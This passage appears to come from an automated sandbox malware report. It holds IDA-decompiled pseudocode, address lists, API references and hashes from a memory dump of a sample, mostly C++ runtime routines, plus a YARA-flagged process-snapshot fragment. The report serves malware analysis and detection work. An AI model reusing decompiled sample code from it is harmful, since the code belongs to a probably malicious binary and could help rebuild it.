				_t88 =  *((intOrPtr*)(_t79 + 8));
				if(_t88 == 0) {
					L20:
					 *[fs:0x0] = _v24;
					return 2;
				} else {
					_t113 =  *_t88;
					if( *_t88 != 0) {
						goto L20;
					} else {
						_t52 = E0041362C(_t79, _t88, __esi, _t113, 0x18);
						_t107 = _t104 + 4;
						_v32 = _t52;
						_v16 = 0;
						_t84 =  *((intOrPtr*)( *((intOrPtr*)(_t79 + 0xc)) + 4));
						if(_t84 == 0) {
							_t92 = 0x43e90c;
						} else {
							_t92 =  *((intOrPtr*)(_t84 + 0x18));
							if(_t92 == 0) {
								_t10 = _t84 + 0x1c; // 0x1c
								_t92 = _t10;
							}
						}
						_t85 =  &_v104;
						E0041247D( &_v104, 0);
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						_v88 = 0;
						_v84 = 0;
						_v80 = 0;
						_v76 = 0;
						_v72 = 0;
						_v68 = 0;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v16 = 7;
						_t116 = _t92;
						if(_t92 == 0) {
							E00412430("bad locale name");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t96);
							return E00412AA5( &_v104, _v116 & 0x000000ff, _t85 + 8);
						} else {
							E00412760( &_v104,  &_v104, _t92); // executed
							_t93 = _v32;
							 *((intOrPtr*)(_t93 + 4)) = 0;
							 *_t93 = 0x4343e8;
							E00412A3A(_t88, _t93, _t116,  &_v52);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							 *_t88 = _t93;
							_v16 = 8;
							E004127AB(_t85,  &_v104);
							_t65 = _v60;
							_t110 = _t107 + 0x10;
							if(_v60 != 0) {
								E0041AC1E(_t65);
								_t110 = _t110 + 4;
							}
							_t66 = _v68;
							_v60 = 0;
							if(_v68 != 0) {
								E0041AC1E(_t66);
								_t110 = _t110 + 4;
							}
							_t67 = _v76;
							_v68 = 0;
							if(_v76 != 0) {
								E0041AC1E(_t67);
								_t110 = _t110 + 4;
							}
							_t68 = _v84;
							_v76 = 0;
							if(_v84 != 0) {
								E0041AC1E(_t68);
								_t110 = _t110 + 4;
							}
							_t69 = _v92;
							_v84 = 0;
							if(_v92 != 0) {
								E0041AC1E(_t69);
								_t110 = _t110 + 4;
							}
							_t70 = _v100;
							_v92 = 0;
							if(_v100 != 0) {
								E0041AC1E(_t70);
							}
							_v100 = 0;
							E004124D5( &_v104);
							goto L20;
						}
					}
				}
			}

0x004035c0
0x004035c1
0x004035c9
0x004035d0
0x004035d4
0x004035d6
0x004035d8
0x004035e3
0x004035e4
0x004035e5
0x004035e8
0x004035e9
0x004035ea
0x004035f1
0x004035f5
0x004035fb
0x00403600
0x0040375e
0x00403766
0x00403776
0x00403606
0x00403606
0x00403609
0x00000000
0x0040360f
0x00403611
0x00403616
0x00403619
0x0040361f
0x00403626
0x0040362b
0x00403639
0x0040362d
0x0040362d
0x00403632
0x00403634
0x00403634
0x00403634
0x00403632
0x00403640
0x00403643
0x00403648
0x0040364f
0x00403653
0x0040365a
0x00403660
0x00403667
0x0040366b
0x0040366e
0x00403672
0x00403675
0x00403678
0x0040367b
0x0040367e
0x00403682
0x00403684
0x0040377c
0x00403781
0x00403782
0x00403783
0x00403784
0x00403785
0x00403786
0x00403787
0x00403788
0x00403789
0x0040378a
0x0040378b
0x0040378c
0x0040378d
0x0040378e
0x0040378f
0x00403790
0x004037a5
0x0040368a
0x0040368f
0x00403694
0x0040369b
0x004036a2
0x004036a8
0x004036b0
0x004036b3
0x004036b7
0x004036bc
0x004036c4
0x004036c9
0x004036cc
0x004036d1
0x004036d4
0x004036d9
0x004036d9
0x004036dc
0x004036df
0x004036e8
0x004036eb
0x004036f0
0x004036f0
0x004036f3
0x004036f6
0x004036ff
0x00403702
0x00403707
0x00403707
0x0040370a
0x0040370d
0x00403716
0x00403719
0x0040371e
0x0040371e
0x00403721
0x00403724
0x0040372d
0x00403730
0x00403735
0x00403735
0x00403738
0x0040373b
0x00403744
0x00403747
0x0040374c
0x00403752
0x00403759
0x00000000
0x00403759
0x00403684
0x00403609

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403643
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040368F
__Getctype.LIBCPMT ref: 004036A8
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004036C4
std::_Lockit::~_Lockit.LIBCPMT ref: 00403759

Strings

bad locale name, xrefs: 00403777

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: 5983c786910b829a307b3144aa9c46a8f6e2be0f10f8d0e085dda1fe5a4d010f
Instruction ID: 254f5c476f8fbd2f3037df258afc1bf66e45135af037bcfa69ef326ad7ebc691
Opcode Fuzzy Hash: 5983c786910b829a307b3144aa9c46a8f6e2be0f10f8d0e085dda1fe5a4d010f
Instruction Fuzzy Hash: E151BFF1D01248ABDB10DFA5D945BDEBBB8AF14304F14402AE805E7381E779AA58CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00408230 Relevance: 9.2, APIs: 6, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00408230(void* __ebx, intOrPtr* _a4) {
				char _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				char _v32;
				void* _v36;
				intOrPtr _v56;
				char _v64;
				char _v68;
				intOrPtr* _v72;
				char _v76;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				void* _t56;
				signed int _t59;
				intOrPtr* _t68;
				char _t70;
				void* _t71;
				intOrPtr* _t73;
				void* _t77;
				signed int _t82;
				signed int _t83;
				char _t85;
				void* _t86;
				signed int _t88;
				intOrPtr* _t94;
				intOrPtr* _t96;
				signed int _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr* _t114;
				intOrPtr* _t115;
				void* _t116;
				signed int _t120;
				void* _t122;
				void* _t123;
				signed int _t124;
				void* _t130;

				_push(0xffffffff);
				_push(0x431b55);
				_push( *[fs:0x0]);
				_t123 = _t122 - 0x18;
				_t48 =  *0x443048; // 0x35200185
				_t49 = _t48 ^ _t120;
				_v20 = _t49;
				_push(__ebx);
				_push(_t49);
				 *[fs:0x0] =  &_v16;
				_t114 = _a4;
				_v28 = _t114;
				E0041247D( &_v32, 0);
				_v8 = 0;
				_t109 =  *0x444328; // 0x1
				_t85 =  *0x444f48; // 0x6a59a8
				_v36 = _t85;
				if(_t109 == 0) {
					E0041247D( &_v24, _t109);
					_t130 =  *0x444328 - _t109; // 0x1
					if(_t130 == 0) {
						_t82 =  *0x444310; // 0x2
						_t83 = _t82 + 1;
						 *0x444310 = _t83;
						 *0x444328 = _t83;
					}
					E004124D5( &_v24);
					_t109 =  *0x444328; // 0x1
				}
				_t104 =  *((intOrPtr*)(_t114 + 4));
				_t88 = _t109 * 4;
				_v24 = _t88;
				if(_t109 >=  *((intOrPtr*)(_t104 + 0xc))) {
					_t115 = 0;
					__eflags = 0;
					_v24 = _t88;
					goto L8;
				} else {
					_t115 =  *((intOrPtr*)(_t88 +  *((intOrPtr*)(_t104 + 8))));
					if(_t115 != 0) {
						L16:
						E004124D5( &_v32);
						 *[fs:0x0] = _v16;
						_pop(_t110);
						_pop(_t116);
						_pop(_t86);
						return E0041361E(_t115, _t86, _v20 ^ _t120, _t104, _t110, _t116);
					} else {
						L8:
						if( *((char*)(_t104 + 0x14)) == 0) {
							L11:
							if(_t115 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t77 = E0041265A();
							if(_t109 >=  *((intOrPtr*)(_t77 + 0xc))) {
								L12:
								if(_t85 == 0) {
									_push(_v28);
									_t56 = E004035C0(_t85, _t109, _t115,  &_v36); // executed
									_t124 = _t123 + 8;
									__eflags = _t56 - 0xffffffff;
									if(__eflags == 0) {
										E00403390();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t59 =  *0x443048; // 0x35200185
										 *[fs:0x0] =  &_v64;
										_t111 = _t104;
										_t94 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t88 + 4)) + _t88 + 0x30)) + 4));
										_v72 = _t94;
										 *((intOrPtr*)( *_t94 + 4))(_t59 ^ _t124, _t109, _t115,  *[fs:0x0], 0x431b8d, 0xffffffff, _t120);
										_v56 = 0;
										_t68 = E00408230(_t85,  &_v76);
										_t70 =  *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x20))))(0xa);
										_v56 = 0xffffffff;
										_t96 = _v72;
										_v68 = _t70;
										__eflags = _t96;
										if(_t96 != 0) {
											_t73 =  *((intOrPtr*)( *_t96 + 8))();
											__eflags = _t73;
											if(_t73 != 0) {
												 *((intOrPtr*)( *_t73))(1);
											}
										}
										_t71 = E004093C0(_t117, _t111, _v24);
										 *[fs:0x0] = _v20;
										return _t71;
									} else {
										_t115 = _v36;
										_v28 = _t115;
										_v8 = 1;
										E0041262E(__eflags, _t115);
										_t104 =  *_t115;
										 *((intOrPtr*)( *_t115 + 4))();
										 *0x444f48 = _t115;
										goto L16;
									}
								} else {
									_t115 = _t85;
									goto L16;
								}
							} else {
								_t115 =  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_t77 + 8))));
								goto L11;
							}
						}
					}
				}
			}

0x00408233
0x00408235
0x00408240
0x00408241
0x00408244
0x00408249
0x0040824b
0x0040824e
0x00408251
0x00408255
0x0040825b
0x00408263
0x00408266
0x0040826b
0x00408272
0x00408278
0x0040827e
0x00408283
0x00408289
0x0040828e
0x00408294
0x00408296
0x0040829b
0x0040829c
0x004082a1
0x004082a1
0x004082a9
0x004082ae
0x004082ae
0x004082b4
0x004082b7
0x004082be
0x004082c4
0x004082d2
0x004082d2
0x004082d4
0x00000000
0x004082c6
0x004082c9
0x004082ce
0x00408330
0x00408333
0x0040833d
0x00408345
0x00408346
0x00408347
0x00408355
0x004082d0
0x004082d7
0x004082db
0x004082f0
0x004082f2
0x00000000
0x00000000
0x00000000
0x00000000
0x004082dd
0x004082dd
0x004082e5
0x004082f4
0x004082f6
0x004082fc
0x00408303
0x00408308
0x0040830b
0x0040830e
0x00408356
0x0040835b
0x0040835c
0x0040835d
0x0040835e
0x0040835f
0x00408376
0x00408381
0x00408387
0x00408394
0x00408397
0x0040839c
0x004083a2
0x004083aa
0x004083bb
0x004083bd
0x004083c4
0x004083c7
0x004083ca
0x004083cc
0x004083d0
0x004083d3
0x004083d5
0x004083dd
0x004083dd
0x004083d5
0x004083e6
0x004083f1
0x004083fe
0x00408310
0x00408310
0x00408313
0x00408317
0x0040831b
0x00408320
0x00408327
0x0040832a
0x00000000
0x0040832a
0x004082f8
0x004082f8
0x00000000
0x004082f8
0x004082e7
0x004082ed
0x00000000
0x004082ed
0x004082e5
0x004082db
0x004082ce

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00408266
std::_Lockit::_Lockit.LIBCPMT ref: 00408289
std::_Lockit::~_Lockit.LIBCPMT ref: 004082A9
std::_Facet_Register.LIBCPMT ref: 0040831B
std::_Lockit::~_Lockit.LIBCPMT ref: 00408333
Concurrency::cancel_current_task.LIBCPMT ref: 00408356

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 87774a9dc8f573c4a9ef3d66c917a1f1c49bbed0bdb15b10dc3c0ac9c5a7ed92
Instruction ID: 3cf1d87b0c504b2f8fbd786a8a1fe183cf1aacdb51a1657d7749914dfd094a4d
Opcode Fuzzy Hash: 87774a9dc8f573c4a9ef3d66c917a1f1c49bbed0bdb15b10dc3c0ac9c5a7ed92
Instruction Fuzzy Hash: 8751F175A00609DFCB14DF54D941BAEB7B4FB49B24F14027EE805A7391DB38AE00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421755 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00421755(signed int _a4, void* _a8, signed int _a12, intOrPtr _a16) {
				void* _v5;
				void* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				long _v44;
				char _v48;
				intOrPtr _v52;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t78;
				intOrPtr _t82;
				char _t83;
				signed char _t85;
				signed int _t87;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				signed int _t96;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr _t117;
				signed int _t119;
				struct _OVERLAPPED* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				struct _OVERLAPPED* _t129;
				void* _t132;

				_t114 = _a12;
				_t78 = _a8;
				_v12 = _t78;
				_v16 = _t114;
				_t113 = _a16;
				_t124 = _a4;
				if(_t114 == 0) {
					L36:
					__eflags = 0;
					return 0;
				}
				if(_t78 != 0) {
					_t127 = _t124 >> 6;
					_t123 = (_t124 & 0x0000003f) * 0x38;
					_v20 = _t127;
					_t82 =  *((intOrPtr*)(0x444b30 + _t127 * 4));
					_v52 = _t82;
					_v24 = _t123;
					_t83 =  *((intOrPtr*)(_t123 + _t82 + 0x29));
					_v5 = _t83;
					__eflags = _t83 - 2;
					if(_t83 == 2) {
						L6:
						_t85 =  !_t114;
						__eflags = _t85 & 0x00000001;
						if((_t85 & 0x00000001) == 0) {
							goto L2;
						}
						L7:
						_t129 = 0;
						__eflags =  *(_t123 + _v52 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E004254A3(_t124, 0, 0, 2, _t113);
							_t132 = _t132 + 0x14;
						}
						_t90 = E004212A2(_t114, _t123, __eflags, _t124, _t113);
						__eflags = _t90;
						if(_t90 == 0) {
							_t117 =  *((intOrPtr*)(0x444b30 + _v20 * 4));
							_t92 = _v24;
							__eflags =  *((char*)(_t92 + _t117 + 0x28));
							if( *((char*)(_t92 + _t117 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t95 = WriteFile( *(_t92 + _t117 + 0x18), _v12, _v16,  &_v44, _t129); // executed
								__eflags = _t95;
								if(_t95 == 0) {
									_v48 = GetLastError();
								}
								goto L26;
							}
							_t101 = _v5 - _t129;
							__eflags = _t101;
							if(_t101 == 0) {
								E00421320( &_v48, _t124, _v12, _v16);
								L20:
								goto L13;
							}
							_t104 = _t101 - 1;
							__eflags = _t104;
							if(_t104 == 0) {
								_t103 = E004214E4( &_v48, _t124, _v12, _v16);
								goto L20;
							}
							__eflags = _t104 != 1;
							if(_t104 != 1) {
								goto L32;
							}
							_t103 = E004213FB( &_v48, _t124, _v12, _v16);
							goto L20;
						} else {
							_t108 = _v5;
							__eflags = _t108;
							if(_t108 == 0) {
								_t103 = E00420E68( &_v48, _t124, _v12, _v16, _t113);
								L13:
								L26:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t96 = _v32;
								__eflags = _t96;
								if(_t96 != 0) {
									return _t96 - _v28;
								}
								_t87 = _v36;
								__eflags = _t87;
								if(_t87 == 0) {
									_t129 = 0;
									__eflags = 0;
									L32:
									_t119 = _v24;
									_t87 =  *(0x444b30 + _v20 * 4);
									__eflags =  *(_t119 + _t87 + 0x28) & 0x00000040;
									if(( *(_t119 + _t87 + 0x28) & 0x00000040) == 0) {
										L34:
										 *((char*)(_t113 + 0x1c)) = 1;
										 *((intOrPtr*)(_t113 + 0x18)) = 0x1c;
										 *((char*)(_t113 + 0x24)) = 1;
										 *(_t113 + 0x20) = _t129;
										L3:
										return _t87 | 0xffffffff;
									}
									_t87 = _v12;
									__eflags =  *_t87 - 0x1a;
									if( *_t87 == 0x1a) {
										goto L36;
									}
									goto L34;
								}
								_t120 = 5;
								__eflags = _t87 - _t120;
								if(_t87 != _t120) {
									_t87 = E0041CA1C(_t87, _t113);
								} else {
									 *((char*)(_t113 + 0x1c)) = 1;
									 *((intOrPtr*)(_t113 + 0x18)) = 9;
									 *((char*)(_t113 + 0x24)) = 1;
									 *(_t113 + 0x20) = _t120;
								}
								goto L3;
							}
							__eflags = _t108 - 1 - 1;
							if(_t108 - 1 > 1) {
								goto L32;
							}
							E0042123A( &_v48, _v12, _v16);
							goto L13;
						}
					}
					__eflags = _t83 - 1;
					if(_t83 != 1) {
						goto L7;
					}
					goto L6;
				}
				L2:
				 *((char*)(_t113 + 0x24)) = 1;
				 *(_t113 + 0x20) = 0;
				 *((char*)(_t113 + 0x1c)) = 1;
				 *((intOrPtr*)(_t113 + 0x18)) = 0x16;
				_t87 = E00417FD2(_t124, _t127, 0, 0, 0, 0, 0, _t113);
				goto L3;
			}

0x0042175d
0x00421760
0x00421763
0x00421766
0x0042176a
0x0042176f
0x00421774
0x0042194e
0x0042194e
0x00000000
0x0042194e
0x0042177c
0x004217af
0x004217b2
0x004217b5
0x004217b8
0x004217bf
0x004217c2
0x004217c5
0x004217c9
0x004217cc
0x004217ce
0x004217d4
0x004217d6
0x004217d8
0x004217da
0x00000000
0x00000000
0x004217dc
0x004217df
0x004217e1
0x004217e6
0x004217ee
0x004217f3
0x004217f3
0x004217f8
0x004217ff
0x00421801
0x00421846
0x0042184d
0x00421850
0x00421855
0x004218af
0x004218b1
0x004218b2
0x004218be
0x004218c4
0x004218c6
0x004218ce
0x004218ce
0x00000000
0x004218d1
0x0042185b
0x0042185b
0x0042185d
0x0042189f
0x0042187d
0x00000000
0x0042187d
0x0042185f
0x0042185f
0x00421862
0x0042188d
0x00000000
0x0042188d
0x00421864
0x00421867
0x00000000
0x00000000
0x00421878
0x00000000
0x00421803
0x00421803
0x00421806
0x00421808
0x00421839
0x00421826
0x004218d4
0x004218d7
0x004218d8
0x004218d9
0x004218da
0x004218dd
0x004218df
0x00000000
0x00421949
0x004218e1
0x004218e4
0x004218e6
0x00421914
0x00421914
0x00421916
0x00421919
0x0042191c
0x00421923
0x00421928
0x00421932
0x00421932
0x00421936
0x0042193d
0x00421941
0x004217a0
0x00000000
0x004217a0
0x0042192a
0x0042192d
0x00421930
0x00000000
0x00000000
0x00000000
0x00421930
0x004218ea
0x004218eb
0x004218ed
0x00421908
0x004218ef
0x004218ef
0x004218f3
0x004218fa
0x004218fe
0x004218fe
0x00000000
0x004218ed
0x0042180c
0x0042180e
0x00000000
0x00000000
0x0042181e
0x00000000
0x00421823
0x00421801
0x004217d0
0x004217d2
0x00000000
0x00000000
0x00000000
0x004217d2
0x0042177e
0x00421780
0x00421788
0x0042178c
0x00421791
0x00421798
0x00000000

APIs

Part of subcall function 00420E68: GetConsoleOutputCP.KERNEL32(35200185,00000000,00000000,00000000), ref: 00420ECB

WriteFile.KERNELBASE(?,00000000,?,00441FD0,00000000,0000000C,00000000,00000000,?,00000000,00441FD0,00000010,0041A902,00000000,00000000,00000000), ref: 004218BE
GetLastError.KERNEL32(?,00000000), ref: 004218C8

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: ab1c2bd6591ddf14b83c66c1379ddd2b9e81412aeff914078a17c4daf9677959
Instruction ID: 8b962300b63b15e36b69ed4417ac3f0d6651065ecfc2e4b6ffd6c8d1f07ee155
Opcode Fuzzy Hash: ab1c2bd6591ddf14b83c66c1379ddd2b9e81412aeff914078a17c4daf9677959
Instruction Fuzzy Hash: 7F61F9B1E00169AFDF11DFA9D884AEF7BB8AF59318F540057E800E7262D339D941CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0 Relevance: 3.2, APIs: 2, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00404FE0(intOrPtr* __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t56;
				intOrPtr* _t59;
				intOrPtr _t61;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr* _t73;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				char* _t96;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr* _t105;
				intOrPtr _t107;
				void* _t109;
				intOrPtr _t110;
				signed int _t113;
				void* _t115;
				intOrPtr _t117;

				_t115 = (_t113 & 0xfffffff8) - 0xc;
				_t45 = _a12;
				_t73 = __ecx;
				_t78 = _a8;
				_t96 = _a4;
				_v16 = _t96;
				_t117 = _t45;
				if(_t117 > 0 || _t117 >= 0 && _t78 != 0) {
					__eflags =  *((intOrPtr*)(_t73 + 0x38));
					if( *((intOrPtr*)(_t73 + 0x38)) == 0) {
						_t105 = _t73 + 0x2c;
						_t97 = _t78;
						_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x1c))));
						__eflags = _t89;
						if(_t89 != 0) {
							_t56 =  *((intOrPtr*)( *_t105));
							__eflags = _t56;
							if(_t56 != 0) {
								_t99 = _v16;
								__eflags = _t56 - _t78;
								_t109 =  <  ? _t56 : _t78;
								E00414BF0(_t99, _t89, _t109);
								_v16 = _t99 + _t109;
								_t115 = _t115 + 0xc;
								_t97 = _a8 - _t109;
								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x2c)))) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x2c)))) - _t109;
								_t59 =  *((intOrPtr*)(_t73 + 0x1c));
								 *_t59 =  *_t59 + _t109;
								__eflags =  *_t59;
								_t105 = _t73 + 0x2c;
							}
						}
						__eflags =  *((intOrPtr*)(_t73 + 0x4c));
						if( *((intOrPtr*)(_t73 + 0x4c)) != 0) {
							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xc)))) - _t73 + 0x3c;
							if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xc)))) == _t73 + 0x3c) {
								_t80 =  *((intOrPtr*)(_t73 + 0x50));
								_t92 =  *((intOrPtr*)(_t73 + 0x54)) - _t80;
								__eflags = _t92;
								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xc)))) = _t80;
								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x1c)))) = _t80;
								 *((intOrPtr*)( *_t105)) = _t92;
							}
							_t107 = _v16;
							__eflags = _t97 - 0xfff;
							if(_t97 <= 0xfff) {
								L30:
								__eflags = _t97;
								if(_t97 != 0) {
									_t97 = _t97 - E0041B9E6(_t107, 1, _t97,  *((intOrPtr*)(_t73 + 0x4c)));
									__eflags = _t97;
								}
							} else {
								while(1) {
									_t51 = E0041B9E6(_t107, 1, 0xfff,  *((intOrPtr*)(_t73 + 0x4c))); // executed
									_t115 = _t115 + 0x10;
									_t107 = _t107 + _t51;
									_t97 = _t97 - _t51;
									__eflags = _t51 - 0xfff;
									if(_t51 != 0xfff) {
										goto L32;
									}
									__eflags = _t97 - _t51;
									if(_t97 > _t51) {
										continue;
									} else {
										goto L30;
									}
									goto L32;
								}
							}
						}
						L32:
						_t48 = _a8 - _t97;
						__eflags = _t48;
						asm("sbb edx, 0x0");
						return _t48;
					} else {
						_v12 = _t78;
						_v16 = _t45;
						goto L6;
						do {
							do {
								L6:
								_t110 = E004071B0(_t73);
								_t61 = _t88;
								_v8 = _t61;
								__eflags = _t61;
								if(__eflags < 0) {
									L14:
									_t63 =  *((intOrPtr*)( *_t73 + 0x1c))();
									_t88 = _v16;
									__eflags = _t63 - 0xffffffff;
									if(_t63 != 0xffffffff) {
										_t110 = 1;
										_t85 = _v12 + 0xffffffff;
										 *_t96 = _t63;
										asm("adc edx, 0xffffffff");
										goto L16;
									}
								} else {
									if(__eflags > 0) {
										L9:
										_t86 = _v16;
										__eflags = _t86 - _t61;
										if(__eflags <= 0) {
											_t70 = _v12;
											if(__eflags < 0) {
												L12:
												_t110 = _t70;
												_v8 = _t86;
											} else {
												__eflags = _t70 - _t110;
												if(_t70 < _t110) {
													goto L12;
												}
											}
										}
										E00414BF0(_t96,  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x1c)))), _t110);
										_t115 = _t115 + 0xc;
										_t88 = _v16;
										_t85 = _v12 - _t110;
										asm("sbb edx, [esp+0x14]");
										 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x2c)))) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x2c)))) - _t110;
										 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x1c)))) + _t110;
										goto L16;
									} else {
										__eflags = _t110;
										if(_t110 == 0) {
											goto L14;
										} else {
											goto L9;
										}
									}
								}
								goto L19;
								L16:
								_t96 = _t96 + _t110;
								_v16 = _t88;
								_v12 = _t85;
								__eflags = _t88;
							} while (__eflags > 0);
							if(__eflags >= 0) {
								goto L18;
							}
							break;
							L18:
							__eflags = _t85;
						} while (_t85 != 0);
						L19:
						_t65 = _a8 - _v12;
						__eflags = _t65;
						asm("sbb ecx, edx");
						return _t65;
					}
				} else {
					return 0;
				}
			}

0x00404fe6
0x00404fe9
0x00404fed
0x00404fef
0x00404ff4
0x00404ff7
0x00404ffb
0x00404ffd
0x00405012
0x00405016
0x004050d5
0x004050d8
0x004050da
0x004050dc
0x004050de
0x004050e2
0x004050e4
0x004050e6
0x004050e8
0x004050ec
0x004050f0
0x004050f6
0x00405100
0x00405104
0x0040510a
0x0040510c
0x0040510e
0x00405111
0x00405111
0x00405113
0x00405113
0x004050e6
0x00405116
0x0040511a
0x00405122
0x00405124
0x0040512c
0x0040512f
0x0040512f
0x00405131
0x00405136
0x0040513a
0x0040513a
0x0040513c
0x00405140
0x00405146
0x00405172
0x00405172
0x00405174
0x00405185
0x00405185
0x00405185
0x00000000
0x00405150
0x0040515b
0x00405160
0x00405163
0x00405165
0x00405167
0x0040516c
0x00000000
0x00000000
0x0040516e
0x00405170
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405170
0x00405150
0x00405146
0x00405187
0x0040518d
0x0040518d
0x00405191
0x00405198
0x0040501c
0x0040501c
0x00405020
0x00405020
0x00405024
0x00405024
0x00405024
0x0040502b
0x0040502d
0x0040502f
0x00405033
0x00405035
0x0040507e
0x00405082
0x00405085
0x00405089
0x0040508c
0x00405092
0x00405097
0x0040509a
0x0040509c
0x00000000
0x0040509c
0x00405037
0x00405037
0x0040503d
0x0040503d
0x00405041
0x00405043
0x00405045
0x00405049
0x0040504f
0x0040504f
0x00405051
0x0040504b
0x0040504b
0x0040504d
0x00000000
0x00000000
0x0040504d
0x00405049
0x0040505c
0x00405064
0x0040506b
0x0040506f
0x00405071
0x00405075
0x0040507a
0x00000000
0x00405039
0x00405039
0x0040503b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040503b
0x00405037
0x00000000
0x0040509f
0x0040509f
0x004050a1
0x004050a5
0x004050a9
0x004050a9
0x004050b1
0x00000000
0x00000000
0x00000000
0x004050b3
0x004050b3
0x004050b3
0x004050bb
0x004050be
0x004050be
0x004050c5
0x004050cf
0x004050cf
0x00405005
0x0040500f
0x0040500f

APIs

__fread_nolock.LIBCMT ref: 0040515B
__fread_nolock.LIBCMT ref: 0040517D

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 0ac186de8173e836d64ea4dd8b33efb366802e11e028438706aeff430bbd6b64
Instruction ID: 986d411bb441575111edcd92c18ced28c16d22038d465e92f8789a3aa8dafabb
Opcode Fuzzy Hash: 0ac186de8173e836d64ea4dd8b33efb366802e11e028438706aeff430bbd6b64
Instruction Fuzzy Hash: B5515A72A046018FCB14CE2DD880A6B77A6EFC5320F15867AE858DB395E735DC058F99

Uniqueness

Uniqueness Score: -1.00%

Function 006A934E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006A9376
Module32First.KERNEL32(00000000,00000224), ref: 006A9396

Memory Dump Source

Source File: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6a8000_C676.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
